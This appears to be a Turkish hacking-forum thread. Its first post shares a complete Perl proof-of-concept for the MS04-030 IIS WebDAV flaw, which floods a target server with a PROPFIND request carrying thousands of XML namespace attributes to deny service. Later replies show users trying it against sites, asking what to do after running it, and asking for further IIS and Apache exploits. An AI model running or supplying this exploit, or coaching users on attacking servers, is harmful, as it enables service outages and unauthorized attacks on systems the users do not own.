Microsoft IIS WebDAV XML Denial of Service Exploit

Partizan

New member
Katılım
18 Haz 2005
Mesajlar
1,346
Reaction score
0
Puanları
0
Yaş
44
Konum
Cuba
Dav'in yaptigi isi daha professionaLce yapmaya yarayan ExpLoit..

Kod:
#!/usr/bin/perl
# IIS BlowOut 
# POC exploit for MS04-030. Found by Amit Klein. 
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" "; 

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " . 
$xmlatt . 
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: 
$host\nContent-length: $l\n\n$xmldata\n\n"; 

syswrite($socket,$req,length($req));

close $socket;
 
bi halta yaramıyor hoca , perl de çalıştırdım.
hiç bişi demedi
nasıl kullanılcak bu ne işe yarar bide onu anlatsan . boyle yazıp bırakmayın bişi anlatacaksanız tam anlatın.
 
Git biraz konuları arastır.Bak bakimbu exploit nedir diye adam "Dav'in yaptigi isi daha professionaLce yapmaya yarayan ExpLoit" daha bundan acık anlatımı warmıdır.Bu ara saga sola ahkam kesecegıne gıt bıras arastırma yap ama artıstlık yapma.....
 
blue dark exploit konusunu iyi biliyorsan bu exploitin ne işe yaradıgını anlatda bi işe yara ..
 
Merak etme senden iyi biliyorum superhacker :) Hangi konuyu ogrenmek istiyorsun Davstan baslayalımmı ;)
 
yok canım ben davs gibi lamer işleri ile uğrasmıyorum. sen bana iss 6.0 ile ilgili apache 2.0.54 ile ilgili exploit bulursan onları anlat ..
 
Tartisma aLani degiL burasi d0stum.. tekrari oLmassa sewinirim.. armut pis azima dus isteme..!
 
yok hoca estafrullah armut dus agzıma piş olayı değil zahten her gun 10 saat hack olayını kasana kadar anam ağlıyor. sadece bu nasıl kullanılır bilgi istedim. tabı vermek veya vermemek bilen kişiye kalmış bişi diyemem.
 
SuperHacker21 Bir Mesaj Daha Yazarsan Yonetimden BanLanmani TaLep Ederim... Burasi fLood Forumu DegiL... MAdem Dav Lamerce Neden BununLa ugrasiyorsun ? Bu da Davin isLevini yapiyor... Partizan TesekkurLer Sunun ISS 4.0 Perm Kirmasini buLmak Lazim... BiLen Varsa Cekinmesin PM Atsin KârLi Cikar :)
 


ABİ SİTEYE BAĞLANDI SANIRSAM AMA EXPLOİTİ ÇALIŞTIRDIM KADLIM GERİSİ NASIL OLUCAK BİR YARDIM EDERSEN SEVİNİRİM ZATEN EXPLOİTLERDE HEP BÖYLE OLUYO EXPLOİTİ ÇALIŞTIRIYORUM ÖYLE KALIYORUM BUNU KULLANAN VARSA YADA BİLEN VARSA BU ADIMDAN SONRA NAPACAĞIMI SÖYLEYEBİLİRMİ LÜTFENN
(PAYLAŞIM İÇİNDE ÇOK SAOLUN)
 
Geri
Üst